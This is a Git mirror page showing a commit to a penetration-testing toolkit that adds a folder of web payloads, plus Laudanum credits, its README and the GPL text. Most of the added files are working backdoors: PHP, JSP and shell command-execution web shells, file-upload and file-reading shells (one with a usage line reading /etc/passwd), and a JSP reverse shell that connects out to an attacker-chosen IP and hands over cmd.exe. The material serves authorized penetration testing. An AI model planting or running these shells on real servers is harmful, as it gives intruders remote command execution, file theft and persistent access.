Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-05-02 06:46:07 -04:00
Code Issues Projects Releases Packages Wiki Activity

Add some fuzzing stuff and wordlists

Browse source
This commit is contained in:
bt3 2015-08-30 11:13:07 -07:00
parent 4261c9c087
commit 4d24e016b8
160 changed files with 7723391 additions and 527 deletions
Download patch file Download diff file Expand all files Collapse all files

17
Vulnerabilities_and_Exploits/Payloads/FUZZDB_Simple.php Executable file
View file

@ -0,0 +1,17 @@
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->

33
Vulnerabilities_and_Exploits/Payloads/FUZZDB_Up.php Executable file
View file

@ -0,0 +1,33 @@
<?
//
// PHP_KIT
//
// up.php = File Upload
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<html><body>
<form enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
<p>Local File: <input name="userfile" type="file">
<p>Remote File: <input name="remotefile" type="text">
<input type="submit" value="Send">
</form><br><br><br>
<?
if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];
} else {
echo "No File Uploaded";
}
?>
</html></body>

35
Vulnerabilities_and_Exploits/Payloads/FUZZDB_cmd.jsp Executable file
View file

@ -0,0 +1,35 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>

25
Vulnerabilities_and_Exploits/Payloads/FUZZDB_cmd.php Executable file
View file

@ -0,0 +1,25 @@
<?
//
// PHP_KIT
//
// cmd.php = Command Execution
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>

372
Vulnerabilities_and_Exploits/Payloads/FUZZDB_cmd.sh Executable file
View file

@ -0,0 +1,372 @@
#!/bin/sh
#
# SH_KIT
#
# cmd.sh = Command Execution
#
# by: Ludoz
# modified: 23/04/2004
#
# Version 1.2 - 28/5/2003
#
###
###
### Configuracion
###
###
#
# sitios donde buscar ejecutables necesarios, sin la / posterior, separados por espacios
#
PATHS="/bin /usr/bin /sbin /usr/sbin /usr/local/bin /usr/local/sbin /usr/ucb /usr/libexec /tmp /usr/tmp /var/tmp ."
###
###
### La configuracion acaba aqui
###
###
#
# PATHs mas habituales de los 3 comandos base
#
TEST="/usr/bin/test"
BASENAME="/bin/basename"
DIRNAME="/usr/bin/dirname"
# compruebo TEST, BASENAME y DIRNAME y si estan mal intento encontrarlas en el path y sino en PATHS
if (eval $TEST \"1\" = \"1\" ); then
TEST=$TEST
else
for i in $PATHS ; do
TEST="$i/test"
if (eval $TEST \"1\" = \"1\" ); then
break
fi
done
if (eval $TEST \"1\" = \"1\" ); then
TEST=$TEST
else
TEST=test
if (eval $TEST \"1\" = \"1\" ); then
TEST=$TEST
else
TEST=""
echo ERROR: No he encontrado TEST en el sitio especificado ni en el path
echo
exit
fi
fi
fi
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
BASENAME=$BASENAME
else
for i in $PATHS ; do
BASENAME="$i/basename"
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
break
fi
done
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
BASENAME=$BASENAME
else
BASENAME=basename
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
BASENAME=$BASENAME
else
BASENAME=""
echo ERROR: No he encontrado BASENAME en el sitio especificado ni en el path
echo
exit
fi
fi
fi
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
DIRNAME=$DIRNAME
else
for i in $PATHS ; do
DIRNAME="$i/dirname"
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
break
fi
done
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
DIRNAME=$DIRNAME
else
DIRNAME=dirname
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
DIRNAME=$DIRNAME
else
DIRNAME=""
echo ERROR: No he encontrado DIRNAME en el sitio especificado ni en el path
echo
exit
fi
fi
fi
#echo "Info: TEST: $TEST"
#echo "Info: BASENAME: $BASENAME"
#echo "Info: DIRNAME: $DIRNAME"
if (eval $TEST -x \"/usr/bin/unalias\" ); then
# si existe el comando: unalias *
/usr/bin/unalias *
else
# si es interno: unalias -a
unalias -a
fi
#
# A partir de aqui deberia ser 100% multisistema
#
buscaexec ()
{
BUSCAEXECRES=""
if (eval $TEST -z \"$BUSCAEXECPAR\" ); then
return;
fi
if (eval $TEST -x \"$BUSCAEXECPAR\" ); then
BUSCAEXECRES=$BUSCAEXECPAR
return;
fi
BUSCAEXECPAR=`eval $BASENAME $BUSCAEXECPAR`
for i in $PATHS $PATH ; do
if (eval $TEST -x \"$i/$BUSCAEXECPAR\" ); then
BUSCAEXECRES="$i/$BUSCAEXECPAR"
break
fi
done
if (eval $TEST -n \"$BUSCAEXECRES\" ); then
return;
fi
if (eval $TEST -z \"$WHICH\" ); then
return;
fi
BUSCAEXECRES=`eval $WHICH $BUSCAEXECPAR`
if (eval $TEST -n \"$BUSCAEXECRES\" ); then
if (eval $TEST ! -x \"$BUSCAEXECRES\" ); then
BUSCAEXECRES=""
fi
fi
}
#
# Definicion de comandos concretos para el script
#
WHICH=""
BUSCAEXECPAR=/usr/bin/which
buscaexec
WHICH=$BUSCAEXECRES
if (eval $TEST -z \"$WHICH\" ) ; then
if (eval $TEST \"$TEST\" != \"test\" ) ; then
TESTCMD=$TEST
TESTRES="test"
elif (eval $TEST \"$BASENAME\" != \"basename\" ) ; then
TESTCMD=$BASENAME
TESTRES="basename"
elif (eval $TEST \"$BASEDIR\" != \"basedir\" ) ; then
TESTCMD=$BASEDIR
TESTRES="basename"
fi
if (eval $TEST -n \"$TESTCMD\"); then
OLDPATH=$PATH
TESTPATH="`eval $BASEDIR $TESTCMD`"
PATH="$TESTPATH:$PATH"
TESTPATH=""
PRUEBA="`eval $BASENAME \"\`which $TESTRES\`\" `"
if (eval $TEST \"$PRUEBA\" = \"TESTRES\" ) ; then
WHICH="`which which`"
else
WHICH=""
fi
PRUEBA=""
PATH=$OLDPATH
OLDPATH=""
TESTRES=""
TESTCMD=""
fi
fi
BUSCAEXECPAR=/bin/echo
buscaexec
ECHO=$BUSCAEXECRES
if (eval $TEST -z \"$ECHO\" ) ; then
ECHO=echo
fi
A="`eval $ECHO \"a\"`"
if (eval $TEST \"$A\" = \"a\" ) ; then
ECHO=$ECHO
else
ECHO=""
#nota mental: para que hago echo si echo no funciona!? :)
echo ERROR: No he encontrado ECHO en el sitio especificado ni en el path
echo
exit
fi
A=""
BUSCAEXECPAR=/bin/cut
buscaexec
CUT=$BUSCAEXECRES
BUSCAEXECPAR=/bin/sed
buscaexec
SED=$BUSCAEXECRES
BUSCAEXECPAR=/usr/bin/expr
buscaexec
EXPR=$BUSCAEXECRES
FORMULARIO="`eval $BASENAME $0`"
eval $ECHO \"Content-type: text/html\"
eval $ECHO
eval $ECHO \"\<html\>\<title\>CMD.SH\<\/title\>\<body\>\"
eval $ECHO \"\<p\>\<form method\=\\\"GET\\\" name\=\\\"myform\\\" action\=\\\"$FORMULARIO\\\"\>\<\/p\>\"
eval $ECHO \"\<input type\=\\\"text\\\" name\=\\\"cmd\\\"\>\"
eval $ECHO \"\<input type\=\\\"submit\\\" value\=\\\"Enviar\\\"\>\"
eval $ECHO \"\<pre\>\"
#
# La variable QUERYSTRING contiene la info que quiero
#
#echo QUERY_STRING=$QUERY_STRING
if (eval $TEST -n \"$QUERY_STRING\"); then
PARAM=`eval $ECHO \"$QUERY_STRING\" | $CUT \-d\= \-f2 | $SED \-e s\/\+\/\ \/g `
hex2dec()
{
if (eval $TEST \"$PARC\" \= \"0\" ); then
PARC="0"
elif (eval $TEST \"$PARC\" \= \"1\" ); then
PARC="1"
elif (eval $TEST \"$PARC\" \= \"2\" ); then
PARC="2"
elif (eval $TEST \"$PARC\" \= \"3\" ); then
PARC="3"
elif (eval $TEST \"$PARC\" \= \"4\" ); then
PARC="4"
elif (eval $TEST \"$PARC\" \= \"5\" ); then
PARC="5"
elif (eval $TEST \"$PARC\" \= \"6\" ); then
PARC="6"
elif (eval $TEST \"$PARC\" \= \"7\" ); then
PARC="7"
elif (eval $TEST \"$PARC\" \= \"8\" ); then
PARC="8"
elif (eval $TEST \"$PARC\" \= \"9\" ); then
PARC="9"
elif (eval $TEST \"$PARC\" \= \"a\" ); then
PARC="10"
elif (eval $TEST \"$PARC\" \= \"b\" ); then
PARC="11"
elif (eval $TEST \"$PARC\" \= \"c\" ); then
PARC="12"
elif (eval $TEST \"$PARC\" \= \"d\" ); then
PARC="13"
elif (eval $TEST \"$PARC\" \= \"e\" ); then
PARC="14"
elif (eval $TEST \"$PARC\" \= \"f\" ); then
PARC="15"
elif (eval $TEST \"$PARC\" \= \"A\" ); then
PARC="10"
elif (eval $TEST \"$PARC\" \= \"B\" ); then
PARC="11"
elif (eval $TEST \"$PARC\" \= \"C\" ); then
PARC="12"
elif (eval $TEST \"$PARC\" \= \"D\" ); then
PARC="13"
elif (eval $TEST \"$PARC\" \= \"E\" ); then
PARC="14"
elif (eval $TEST \"$PARC\" \= \"F\" ); then
PARC="15"
else
PARC="0"
fi
}
dec2ascii()
{
if (eval $TEST \"$PARC\" -eq \"0\"); then
PARC=""
elif (eval $TEST \"$PARC\" -lt \"32\"); then
PARC=""
elif (eval $TEST \"$PARC\" -eq \"34\"); then
PARC="\\\""
elif (eval $TEST \"$PARC\" -eq \"96\"); then
PARC="\`"
elif (eval $TEST \"$PARC\" -eq \"127\"); then
PARC=""
elif (eval $TEST \"$PARC\" -gt \"127\"); then
PARC=""
else
#aun no rulan todos los caracteres, los que faltan estan impresos en la linea inferior
# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX " ` ?<- el resto se ignoran, son >128
PARC="`eval $ECHO \"123456789ABCDEF0123456789ABCDEF \!X#\$%\&\'\(\)\*+,\-.\/0123456789\:\;\<=\>\?\@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\\\\\]\^_Xabcdefghijklmnopqrstuvwxyz\{\\\|\}\~X0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF\" | $CUT \-b$PARC `"
# X: no printable, en la linea superior esta el caracter
# los 0123456789ABCDEF es para no descontarme poniendo X cuando habia muchas seguidas
# notese que el NULL no sale en el string
# notese que la " y la ` estan como X en el string pq estan tratadas a parte, no se pueden tratar por el eval este
# notese que los caracteres por debajo del 32 tampoco se tratan, y los mayores de 127 tampoco, aunque se pueden añadir... si tienes ganas ;) y los necesitas realmente
fi
}
TODO="$PARAM"
DONE=""
while (eval $TEST -n \"$TODO\" ); do
C=`eval $ECHO \"$TODO\" | $CUT \-b1 `
if (eval $TEST \"$C\" = \"\%\"); then
PARC="`eval $ECHO \"$TODO\" | $CUT \-b2 `"
hex2dec
C1="$PARC"
PARC="`eval $ECHO \"$TODO\" | $CUT \-b3 `"
hex2dec
C2="$PARC"
PARC="`eval $EXPR $C1 \\\* 16 \+ $C2`"
dec2ascii
C="$PARC"
TODO=`eval $ECHO \"$TODO\" | $CUT \-b4\- `
else
TODO=`eval $ECHO \"$TODO\" | $CUT \-b2\- `
fi
DONE="$DONE$C"
done
VALUE="$DONE"
eval $ECHO \"\\\$ $VALUE\"
eval $VALUE
fi
eval $ECHO \"\<\/pre\>\<\/body\>\<\/html\>\"
exit

91
Vulnerabilities_and_Exploits/Payloads/FUZZDB_jsp-reverse.jsp Executable file
View file

@ -0,0 +1,91 @@
// backdoor.jsp
// http://www.security.org.sg/code/jspreverse.html
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
%>
<!-- http://michaeldaw.org 2006 -->

77
Vulnerabilities_and_Exploits/Payloads/FUZZDB_list.jsp Executable file
View file

@ -0,0 +1,77 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// list.jsp = Directory & File View
//
// by: Sierra
// modified: 27/06/2003
//
%>
<%
if(request.getParameter("file")==null) {
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<%
}
%>
<% //read the file name.
try {
File f = new File(request.getParameter("file"));
if(f.isDirectory()) {
int i;
String fname = new String("Unknown");
String fcolor = new String("Black");
%>
<HTML><BODY>
<FONT Face="Courier New, Helvetica" Color="Black">
<%
out.print("<B>Path: <U>" + f.toString() + "</U></B><BR> <BR>");
File flist[] = f.listFiles();
for(i=0; i<flist.length; i++) {
fname = new String( flist[i].toString());
out.print("(");
if(flist[i].isDirectory() == true) {
out.print("d");
fname = fname + "/";
fcolor = new String("Blue");
} else if( flist[i].isFile() == true ) {
out.print("-");
fcolor = new String("Green");
} else {
out.print("?");
fcolor = new String("Red");
}
if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
if(flist[i].canWrite() == true) out.print("w" ); else out.print("-");
out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fname.toString() + "'>" + fname.toString() + "</A> " + "( Size: " + flist[i].length() + " bytes)<BR>\n");
}
%>
</FONT></BODY></HTML>
<%
} else {
if(f.canRead() == true) {
InputStream in = new FileInputStream(f);
ServletOutputStream outs = response.getOutputStream();
int left = 0;
try {
while((left) >= 0 ) {
left = in.read();
outs.write(left);
}
} catch(IOException ex) {ex.printStackTrace();}
outs.flush();
outs.close();
in.close();
} else {
out.print("Can't Read file<BR>");
}
}
} catch(Exception ex) {ex.printStackTrace();}
%>

33
Vulnerabilities_and_Exploits/Payloads/FUZZDB_list.php Executable file
View file

@ -0,0 +1,33 @@
<?
//
// PHP_KIT
//
// list.php = Directory & File Listing
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<?
if($_GET['file']) {
$fichero=$_GET['file'];
} else {
$fichero="/";
}
if($handle = @opendir($fichero)) {
while($filename = readdir($handle)) {
echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
}
closedir($handle);
} else {
echo "FILE: " . $fichero . "<br><hr><pre>";
$fp = fopen($fichero, "r");
$buffer = fread($fp, filesize($fichero));
echo $buffer;
fclose($fp);
}
?>

47
Vulnerabilities_and_Exploits/Payloads/FUZZDB_list.sh Executable file
View file

@ -0,0 +1,47 @@
#!/bin/sh
#
# SH_KIT
#
# list.sh = Directory & File Listing
#
# by: The Dark Raver
# modified: 16/12/2005
#
echo Content-Type: text/html
echo
if [ "$QUERY_STRING" != "" ]
then
echo PATH: $QUERY_STRING "<br><hr>"
echo `ls $QUERY_STRING` > /tmp/test
else
echo PATH: / "<br><hr>"
echo > /tmp/test
QUERY_STRING="/"
root="1"
fi
out=`grep "/" /tmp/test`
if [ "$out" != "" ]
then
echo FICHERO: $QUERY_STRING
echo "<hr><pre>"
cat $QUERY_STRING
else
if [ "$root" != "1" ]
then
echo "( ) <a href=?"$QUERY_STRING"/..>".."</a><br>"
fi
for i in `ls $QUERY_STRING`
do
if [ "$root" == "1" ]
then
echo "( ) <a href=?/"$i">"$i"</a><br>"
else
echo "( ) <a href=?"$QUERY_STRING"/"$i">"$i"</a><br>"
fi
done
fi

BIN
Vulnerabilities_and_Exploits/Payloads/FUZZDB_nc.exe Executable file
View file

Binary file not shown.

43
Vulnerabilities_and_Exploits/Payloads/FUZZDB_up.sh Executable file
View file

@ -0,0 +1,43 @@
#!/bin/sh
#
# BETA1 - upload to /tmp/upload
#
# SH_KIT
#
# up.sh = File Upload
#
# by: The Dark Raver
# modified: 16/12/2005
#
echo Content-Type: text/html
echo
echo "<html><body>"
echo "<form enctype=\"multipart/form-data\" action=\"\" method=\"post\">"
echo "<p>Local File: <input name=\"userfile\" type=\"file\">"
echo "<input type=\"submit\" value=\"Send\">"
echo "</form><br><br><br>"
echo "<hr>"
dd count=$CONTENT_LENGTH bs=1 of=/tmp/test
lineas=`cat /tmp/test | wc -l`
#echo LIN: $lineas
lineas2=`expr $lineas - 4`
#echo LIN2: $lineas2
lineas3=`expr $lineas2 - 1`
#echo LIN3: $lineas3
#echo "<hr>"
tail -$lineas2 /tmp/test > /tmp/test2
head -$lineas3 /tmp/test2 > /tmp/upload
#rm /tmp/test
#rm /tmp/test2
echo "<pre>"
cat /tmp/upload
echo "</pre>"

17
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/CREDITS Executable file
View file

@ -0,0 +1,17 @@
The Team
========================================================
- Kevin Johnson
- Project Lead
- Justin Searle
- Core Developer
- Tim Medin
- Core Developer
- James Jardine
- Core Developer
Additional Coding
========================================================
- Robin Wood

258
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/GPL Executable file
View file

@ -0,0 +1,258 @@
The GNU General Public License (GPL)
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.
59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your freedom to share
and change it. By contrast, the GNU General Public License is intended to
guarantee your freedom to share and change free software--to make sure the
software is free for all its users. This General Public License applies to most
of the Free Software Foundation's software and to any other program whose
authors commit to using it. (Some other Free Software Foundation software is
covered by the GNU Library General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not price. Our
General Public Licenses are designed to make sure that you have the freedom to
distribute copies of free software (and charge for this service if you wish),
that you receive source code or can get it if you want it, that you can change
the software or use pieces of it in new free programs; and that you know you can
do these things.
To protect your rights, we need to make restrictions that forbid anyone to deny
you these rights or to ask you to surrender the rights. These restrictions
translate to certain responsibilities for you if you distribute copies of the
software, or if you modify it.
For example, if you distribute copies of such a program, whether gratis or for
a fee, you must give the recipients all the rights that you have. You must make
sure that they, too, receive or can get the source code. And you must show them
these terms so they know their rights.
We protect your rights with two steps: (1) copyright the software, and (2)
offer you this license which gives you legal permission to copy, distribute
and/or modify the software.
Also, for each author's protection and ours, we want to make certain that
everyone understands that there is no warranty for this free software. If the
software is modified by someone else and passed on, we want its recipients to
know that what they have is not the original, so that any problems introduced
by others will not reflect on the original authors' reputations.
Finally, any free program is threatened constantly by software patents. We wish
to avoid the danger that redistributors of a free program will individually
obtain patent licenses, in effect making the program proprietary. To prevent
this, we have made it clear that any patent must be licensed for everyone's free
use or not licensed at all.
The precise terms and conditions for copying, distribution and modification
follow.
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains a notice
placed by the copyright holder saying it may be distributed under the terms of
this General Public License. The "Program", below, refers to any such program or
work, and a "work based on the Program" means either the Program or any
derivative work under copyright law: that is to say, a work containing the
Program or a portion of it, either verbatim or with modifications and/or
translated into another language. (Hereinafter, translation is included without
limitation in the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not covered by
this License; they are outside its scope. The act of running the Program is not
restricted, and the output from the Program is covered only if its contents
constitute a work based on the Program (independent of having been made by
running the Program). Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's source code as
you receive it, in any medium, provided that you conspicuously and appropriately
publish on each copy an appropriate copyright notice and disclaimer of warranty;
keep intact all the notices that refer to this License and to the absence of any
warranty; and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and you may at
your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion of it, thus
forming a work based on the Program, and copy and distribute such modifications
or work under the terms of Section 1 above, provided that you also meet all of
these conditions:
a) You must cause the modified files to carry prominent notices stating that
you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in whole or
in part contains or is derived from the Program or any part thereof, to be
licensed as a whole at no charge to all third parties under the terms of
this License.
c) If the modified program normally reads commands interactively when run,
you must cause it, when started running for such interactive use in the most
ordinary way, to print or display an announcement including an appropriate
copyright notice and a notice that there is no warranty (or else, saying
that you provide a warranty) and that users may redistribute the program
under these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but does not
normally print such an announcement, your work based on the Program is not
required to print an announcement.)
These requirements apply to the modified work as a whole. If identifiable
sections of that work are not derived from the Program, and can be reasonably
considered independent and separate works in themselves, then this License, and
its terms, do not apply to those sections when you distribute them as separate
works. But when you distribute the same sections as part of a whole which is a
work based on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the entire whole,
and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest your
rights to work written entirely by you; rather, the intent is to exercise the
right to control the distribution of derivative or collective works based on the
Program.
In addition, mere aggregation of another work not based on the Program with the
Program (or with a work based on the Program) on a volume of a storage or
distribution medium does not bring the other work under the scope of this
License.
3. You may copy and distribute the Program (or a work based on it, under
Section 2) in object code or executable form under the terms of Sections 1 and 2
above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable source
code, which must be distributed under the terms of Sections 1 and 2 above on
a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three years, to
give any third party, for a charge no more than your cost of physically
performing source distribution, a complete machine-readable copy of the
corresponding source code, to be distributed under the terms of Sections 1
and 2 above on a medium customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer to
distribute corresponding source code. (This alternative is allowed only for
noncommercial distribution and only if you received the program in object
code or executable form with such an offer, in accord with Subsection b
above.)
The source code for a work means the preferred form of the work for making
modifications to it. For an executable work, complete source code means all
the source code for all modules it contains, plus any associated interface
definition files, plus the scripts used to control compilation and installation
of the executable. However, as a special exception, the source code distributed
need not include anything that is normally distributed (in either source or
binary form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component itself
accompanies the executable.
If distribution of executable or object code is made by offering access to copy
from a designated place, then offering equivalent access to copy the source code
from the same place counts as distribution of the source code, even though third
parties are not compelled to copy the source along with the object code.
4. You may not copy, modify, sublicense, or distribute the Program except as
expressly provided under this License. Any attempt otherwise to copy, modify,
sublicense or distribute the Program is void, and will automatically terminate
your rights under this License. However, parties who have received copies, or
rights, from you under this License will not have their licenses terminated so
long as such parties remain in full compliance.
5. You are not required to accept this License, since you have not signed it.
However, nothing else grants you permission to modify or distribute the Program
or its derivative works. These actions are prohibited by law if you do not
accept this License. Therefore, by modifying or distributing the Program (or any
work based on the Program), you indicate your acceptance of this License to do
so, and all its terms and conditions for copying, distributing or modifying the
Program or works based on it.
6. Each time you redistribute the Program (or any work based on the Program),
the recipient automatically receives a license from the original licensor to
copy, distribute or modify the Program subject to these terms and conditions.
You may not impose any further restrictions on the recipients' exercise of the
rights granted herein. You are not responsible for enforcing compliance by third
parties to this License.
7. If, as a consequence of a court judgment or allegation of patent infringement
or for any other reason (not limited to patent issues), conditions are imposed
on you (whether by court order, agreement or otherwise) that contradict the
conditions of this License, they do not excuse you from the conditions of this
License. If you cannot distribute so as to satisfy simultaneously your
obligations under this License and any other pertinent obligations, then as a
consequence you may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by all those
who receive copies directly or indirectly through you, then the only way you
could satisfy both it and this License would be to refrain entirely from
distribution of the Program.
If any portion of this section is held invalid or unenforceable under any
particular circumstance, the balance of the section is intended to apply and the
section as a whole is intended to apply in other circumstances.
It is not the purpose of this section to induce you to infringe any patents or
other property right claims or to contest validity of any such claims; this
section has the sole purpose of protecting the integrity of the free software
distribution system, which is implemented by public license practices. Many
people have made generous contributions to the wide range of software
distributed through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing to
distribute software through any other system and a licensee cannot impose that
choice.
This section is intended to make thoroughly clear what is believed to be a
consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in certain
countries either by patents or by copyrighted interfaces, the original copyright
holder who places the Program under this License may add an explicit
geographical distribution limitation excluding those countries, so that
distribution is permitted only in or among countries not thus excluded. In such
case, this License incorporates the limitation as if written in the body of
this License.
9. The Free Software Foundation may publish revised and/or new versions of the
General Public License from time to time. Such new versions will be similar in
spirit to the present version, but may differ in detail to address new problems
or concerns.
Each version is given a distinguishing version number. If the Program specifies
a version number of this License which applies to it and "any later version",
you have the option of following the terms and conditions either of that version
or of any later version published by the Free Software Foundation. If the
Program does not specify a version number of this License, you may choose any
version ever published by the Free Software Foundation.
10. If you wish to incorporate parts of the Program into other free programs
whose distribution conditions are different, write to the author to ask
for permission. For software which is copyrighted by the Free Software
Foundation, write to the Free Software Foundation; we sometimes make exceptions
for this. Our decision will be guided by the two goals of preserving the free
status of all derivatives of our free software and of promoting the sharing and
reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE
PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED
IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS
IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT
NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE
PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL
ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE
PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL,
SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY
TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING
RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF
THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER
PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

35
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/README Executable file
View file

@ -0,0 +1,35 @@
Laudanum: Injectable Web Exploit Code v0.4
By Kevin Johnson <kjohnson@secureideas.net>
and the Laudanum Development Team
Project Website: http://laudanum.secureideas.net
Sourceforge Site: http://sourceforge.net/projects/laudanum
SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum
-------------------------------------------------------------------------------
** Copyright (C) 2012 Kevin Johnson and the Laudanum Project Team
**
** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by
** the Free Software Foundation; either version 2 of the License, or
** (at your option) any later version.
**
** This program is distributed in the hope that it will be useful,
** but WITHOUT ANY WARRANTY; without even the implied warranty of
** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
** GNU General Public License for more details.
**
** You should have received a copy of the GNU General Public License
** along with this program; if not, write to the Free Software
** Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
